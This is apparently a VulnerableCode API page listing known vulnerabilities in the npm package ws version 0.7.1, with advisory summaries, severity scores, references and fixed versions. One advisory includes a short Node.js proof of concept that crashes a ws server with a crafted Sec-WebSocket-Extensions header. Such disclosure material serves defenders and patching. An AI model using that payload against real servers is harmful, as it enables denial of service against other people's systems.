Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:npm/ws@0.7.1
Typenpm
Namespace
Namews
Version0.7.1
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version1.1.5
Latest_non_vulnerable_version8.20.1
Affected_by_vulnerabilities
0
url VCID-37mw-j411-a3az
vulnerability_id VCID-37mw-j411-a3az
summary 
Improper Input Validation
ws is a "simple to use, blazing fast and thoroughly tested websocket client, server and console for node.js, up-to-date against RFC-6455". By sending an overly long websocket payload to a `ws` server, it is possible to crash the node process. This affects ws 1.1.0 and earlier.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-10542
reference_id
reference_type
scores
0
value 0.66075
scoring_system epss
scoring_elements 0.98537
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-10542
1
reference_url https://github.com/nodejs/node/issues/7388
reference_id
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/nodejs/node/issues/7388
2
reference_url https://nodesecurity.io/advisories/120
reference_id
reference_type
scores
url https://nodesecurity.io/advisories/120
3
reference_url https://www.npmjs.com/advisories/120
reference_id
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/120
4
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=927671
reference_id 927671
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=927671
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-10542
reference_id CVE-2016-10542
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-10542
6
reference_url https://github.com/advisories/GHSA-6663-c963-2gqg
reference_id GHSA-6663-c963-2gqg
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-6663-c963-2gqg
fixed_packages
0
url pkg:npm/ws@1.1.1
purl pkg:npm/ws@1.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-4851-mkc2-pqdw
1
vulnerability VCID-4u5m-kp7t-x3cf
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.1
aliases CVE-2016-10542, GHSA-6663-c963-2gqg
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-37mw-j411-a3az
1
url VCID-3znc-67dk-13bu
vulnerability_id VCID-3znc-67dk-13bu
summary 
Remote Memory Disclosure
When given a number instead of a string, the ping function sends a non zeroed buffer of the corresponding length which exposes memory to the recipient.
references
0
reference_url https://github.com/websockets/ws/releases/tag/1.0.1
reference_id
reference_type
scores
url https://github.com/websockets/ws/releases/tag/1.0.1
fixed_packages
0
url pkg:npm/ws@1.0.1
purl pkg:npm/ws@1.0.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-37mw-j411-a3az
1
vulnerability VCID-4851-mkc2-pqdw
2
vulnerability VCID-4u5m-kp7t-x3cf
3
vulnerability VCID-hedn-18sd-bba2
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.0.1
aliases GMS-2016-2
risk_score null
exploitability 0.5
weighted_severity 0.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3znc-67dk-13bu
2
url VCID-4851-mkc2-pqdw
vulnerability_id VCID-4851-mkc2-pqdw
summary 
Denial of Service
A specially crafted value of the `Sec-WebSocket-Extensions` header that uses `Object.prototype` property names as extension or parameter names can be used to make a `ws` server crash.
references
0
reference_url https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
reference_id
reference_type
scores
url https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
1
reference_url https://github.com/websockets/ws/releases/tag/3.3.1
reference_id
reference_type
scores
url https://github.com/websockets/ws/releases/tag/3.3.1
fixed_packages
0
url pkg:npm/ws@3.3.1
purl pkg:npm/ws@3.3.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-h5b4-kz93-r7g3
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1
aliases GMS-2017-331
risk_score null
exploitability 0.5
weighted_severity 0.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4851-mkc2-pqdw
3
url VCID-4u5m-kp7t-x3cf
vulnerability_id VCID-4u5m-kp7t-x3cf
summary 
Denial of Service in ws
Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.

## Proof of concept

```
const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r'
  ].join('\r');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
```


## Recommendation

Update to version 3.3.1 or later.
references
0
reference_url https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
1
reference_url https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407
2
reference_url https://nodesecurity.io/advisories/550
reference_id
reference_type
scores
url https://nodesecurity.io/advisories/550
3
reference_url https://snyk.io/vuln/npm:ws:20171108
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/npm:ws:20171108
4
reference_url https://www.npmjs.com/advisories/550
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/550
5
reference_url https://www.npmjs.com/advisories/550/versions
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/550/versions
6
reference_url https://github.com/advisories/GHSA-5v72-xg48-5rpm
reference_id GHSA-5v72-xg48-5rpm
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5v72-xg48-5rpm
fixed_packages
0
url pkg:npm/ws@1.1.5
purl pkg:npm/ws@1.1.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.5
1
url pkg:npm/ws@3.3.1
purl pkg:npm/ws@3.3.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-h5b4-kz93-r7g3
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1
aliases GHSA-5v72-xg48-5rpm, GMS-2019-145
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4u5m-kp7t-x3cf
4
url VCID-hedn-18sd-bba2
vulnerability_id VCID-hedn-18sd-bba2
summary 
DoS due to excessively large websocket message
It is possible to crash the node process by sending an overly long websocket payload to a ws server.
references
0
reference_url https://github.com/nodejs/node/issues/7388
reference_id
reference_type
scores
url https://github.com/nodejs/node/issues/7388
1
reference_url https://github.com/websockets/ws/commit/0328a8f49f004f98d2913016214e93b2fc2713bc
reference_id
reference_type
scores
url https://github.com/websockets/ws/commit/0328a8f49f004f98d2913016214e93b2fc2713bc
fixed_packages
0
url pkg:npm/ws@1.1.1
purl pkg:npm/ws@1.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-4851-mkc2-pqdw
1
vulnerability VCID-4u5m-kp7t-x3cf
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.1
aliases GMS-2016-38
risk_score null
exploitability 0.5
weighted_severity 0.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hedn-18sd-bba2
5
url VCID-ja5c-kd68-67f3
vulnerability_id VCID-ja5c-kd68-67f3
summary 
Improper Restriction of Operations within the Bounds of a Memory Buffer
A vulnerability was found in the ping functionality of the ws module before 1.0.0 which allowed clients to allocate memory by sending a ping frame. The ping functionality by default responds with a pong frame and the previously given payload of the ping frame. This is exactly what you expect, but internally ws always transforms all data that we need to send to a Buffer instance and that is where the vulnerability existed. ws didn't do any checks for the type of data it was sending. With buffers in node when you allocate it when a number instead of a string it will allocate the amount of bytes.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-10518
reference_id
reference_type
scores
0
value 0.00345
scoring_system epss
scoring_elements 0.57288
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-10518
1
reference_url https://gist.github.com/c0nrad/e92005446c480707a74a
reference_id
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://gist.github.com/c0nrad/e92005446c480707a74a
2
reference_url https://github.com/websockets/ws/commit/29293ed11b679e0366fa0f6bb9310b330dafd795
reference_id
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/websockets/ws/commit/29293ed11b679e0366fa0f6bb9310b330dafd795
3
reference_url https://github.com/websockets/ws/releases/tag/1.0.1
reference_id
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/websockets/ws/releases/tag/1.0.1
4
reference_url https://nodesecurity.io/advisories/67
reference_id
reference_type
scores
url https://nodesecurity.io/advisories/67
5
reference_url https://www.npmjs.com/advisories/67
reference_id
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/67
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-10518
reference_id CVE-2016-10518
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-10518
7
reference_url https://github.com/advisories/GHSA-2mhh-w6q8-5hxw
reference_id GHSA-2mhh-w6q8-5hxw
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-2mhh-w6q8-5hxw
fixed_packages
0
url pkg:npm/ws@1.0.1
purl pkg:npm/ws@1.0.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-37mw-j411-a3az
1
vulnerability VCID-4851-mkc2-pqdw
2
vulnerability VCID-4u5m-kp7t-x3cf
3
vulnerability VCID-hedn-18sd-bba2
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.0.1
aliases CVE-2016-10518, GHSA-2mhh-w6q8-5hxw
risk_score 1.4
exploitability 0.5
weighted_severity 2.7
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ja5c-kd68-67f3
Fixing_vulnerabilities
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:npm/ws@0.7.1